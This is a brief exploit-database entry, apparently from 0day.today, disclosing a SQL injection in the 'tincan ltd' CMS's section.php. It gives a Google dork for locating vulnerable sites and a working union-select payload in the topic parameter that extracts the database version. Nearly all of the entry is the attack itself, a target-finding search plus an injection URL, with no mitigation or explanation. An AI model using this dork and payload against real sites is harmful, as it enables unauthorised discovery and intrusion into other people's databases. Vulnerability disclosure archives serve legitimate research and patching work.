id: 10660
date: 01/11/2010
title: tincan ltd (section) SQL Injection Vulnerability
author: altbta
cves: 

================================================
tincan ltd (section) SQL Injection Vulnerability
================================================

===============================================
DorK : intext:'powered by tincan ltd' and  inurl:"section.php?section=9"
===============================================
Exploit :
http://server/section.php?section=9&topic=6+union+select+1,2,3,version(),5--
============================================



#  0day.today [2023-03-24]  #